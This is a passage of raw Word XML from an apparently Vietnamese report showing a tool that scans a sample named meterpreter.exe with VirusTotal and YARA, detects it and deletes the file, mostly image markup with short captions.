    <w:p w14:paraId="7FCFB6FF" w14:textId="3A7B5EFE" w:rsidR="00245C95" w:rsidRDefault="00245C95" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29F80FF7" wp14:editId="482CB82C">
            <wp:extent cx="5733415" cy="2429510"/>
            <wp:effectExtent l="0" t="0" r="635" b="8890"/>
            <wp:docPr id="129465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56144" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId40"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="2429510"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2763AD4E" w14:textId="77777777" w:rsidR="0001081B" w:rsidRDefault="0001081B" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BEBE440" w14:textId="698D35CB" w:rsidR="0001081B" w:rsidRDefault="0001081B" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Giao diện tích hợp 2 công cụ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1631FF74" w14:textId="6797B925" w:rsidR="0001081B" w:rsidRDefault="0001081B" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42A6BF12" wp14:editId="77AB3DD8">
            <wp:extent cx="5130800" cy="3155950"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="4855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0325" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId41"/>
                    <a:srcRect l="3766" r="6744" b="24134"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5130800" cy="3155950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4FEB29" w14:textId="77777777" w:rsidR="00272432" w:rsidRDefault="00272432" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33AA6F7C" w14:textId="214B4200" w:rsidR="00272432" w:rsidRDefault="00272432" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Chọn mã độc để quét</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B3656D" w14:textId="3397B873" w:rsidR="00B83F29" w:rsidRDefault="00B83F29" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E8BE5F9" wp14:editId="6512861A">
            <wp:extent cx="5733415" cy="2927350"/>
            <wp:effectExtent l="0" t="0" r="635" b="6350"/>
            <wp:docPr id="115404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1284" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId42"/>
                    <a:srcRect b="33276"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="2927350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="369960AD" w14:textId="447EB1E2" w:rsidR="00CB2244" w:rsidRDefault="00CB2244" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Chọn mã độc meterpreter.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7665712D" w14:textId="2AAD4BD4" w:rsidR="00B83F29" w:rsidRDefault="00B83F29" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5542CE6B" wp14:editId="67FA420E">
            <wp:extent cx="5733415" cy="2806700"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="135396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7381" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId43"/>
                    <a:srcRect b="18299"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="2806700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7754A63F" w14:textId="77777777" w:rsidR="00EA1BA1" w:rsidRDefault="00EA1BA1" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50BCAA35" w14:textId="77777777" w:rsidR="00EA1BA1" w:rsidRDefault="00EA1BA1" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09F0D414" w14:textId="77777777" w:rsidR="00EA1BA1" w:rsidRDefault="00EA1BA1" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A0332C9" w14:textId="653C4D00" w:rsidR="00EA1BA1" w:rsidRDefault="00553CD8" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tiến hành s</w:t>
      </w:r>
      <w:r w:rsidR="00EA1BA1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>quét bằng virustotal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263640E8" w14:textId="0D6DEA6A" w:rsidR="009054E6" w:rsidRDefault="009054E6" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CC6A5D8" wp14:editId="43842F32">
            <wp:extent cx="5733415" cy="3244850"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="203718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1637" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId44"/>
                    <a:srcRect b="26464"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="3244850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="68904687" w14:textId="0F588F7C" w:rsidR="00D54EAA" w:rsidRDefault="00D54EAA" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kết quả đã phát hiện ra mẫu mã độc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB31AA3" w14:textId="450F8AD9" w:rsidR="000F591E" w:rsidRDefault="000F591E" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="004E8E9D" wp14:editId="47C3CE28">
            <wp:extent cx="5733415" cy="3366135"/>
            <wp:effectExtent l="0" t="0" r="635" b="5715"/>
            <wp:docPr id="74389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94614" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId45"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="3366135"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A97B84" w14:textId="53D7F29C" w:rsidR="00553CD8" w:rsidRDefault="00553CD8" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A640D03" w14:textId="77777777" w:rsidR="00D51949" w:rsidRDefault="00D51949" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CBFE352" w14:textId="77777777" w:rsidR="00D51949" w:rsidRDefault="00D51949" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68B6044A" w14:textId="77777777" w:rsidR="00D51949" w:rsidRDefault="00D51949" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14E4B88B" w14:textId="77777777" w:rsidR="00D51949" w:rsidRDefault="00D51949" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00011527" w14:textId="77777777" w:rsidR="00D51949" w:rsidRDefault="00D51949" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AA4DEB1" w14:textId="77777777" w:rsidR="00D51949" w:rsidRDefault="00D51949" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="259C68E4" w14:textId="77777777" w:rsidR="00D51949" w:rsidRDefault="00D51949" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B1B73D1" w14:textId="77777777" w:rsidR="00D51949" w:rsidRDefault="00D51949" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F93B753" w14:textId="081421AE" w:rsidR="00D51949" w:rsidRDefault="00D51949" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sau đó sử dụng YARA để quét.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8B6ECC" w14:textId="649F532B" w:rsidR="000A2B04" w:rsidRDefault="000A2B04" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F467B27" wp14:editId="6DD0AAC7">
            <wp:extent cx="5733415" cy="2495550"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="146149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1180" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId46"/>
                    <a:srcRect b="25356"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="2495550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1AE321" w14:textId="0E63D3E2" w:rsidR="00755185" w:rsidRDefault="00755185" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kết quả: đã phát hiện ra mẫu mã độc và điểm đánh giá mức độ nguy hiểm của mã độc này là 70</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D5E7B6" w14:textId="70450347" w:rsidR="00DA7D9C" w:rsidRDefault="00DA7D9C" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="435AAC9E" w14:textId="77777777" w:rsidR="00A8142C" w:rsidRDefault="009A0B17" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7AD035F1" wp14:editId="65825B9D">
            <wp:extent cx="5733415" cy="2810510"/>
            <wp:effectExtent l="0" t="0" r="635" b="8890"/>
            <wp:docPr id="202810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2129" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId47"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="2810510"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0D7BC4" w14:textId="5A16BB79" w:rsidR="00A8142C" w:rsidRDefault="00A8142C" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Click xóa File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B74A3C8" w14:textId="7EA9637D" w:rsidR="009A0B17" w:rsidRDefault="00BD0059" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1AE36C1B" wp14:editId="0DFA2CDC">
            <wp:extent cx="5733415" cy="2212340"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="122185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50372" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId48"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="2212340"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="08310932" w14:textId="29E9B00F" w:rsidR="00BD0059" w:rsidRDefault="00663C4C" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
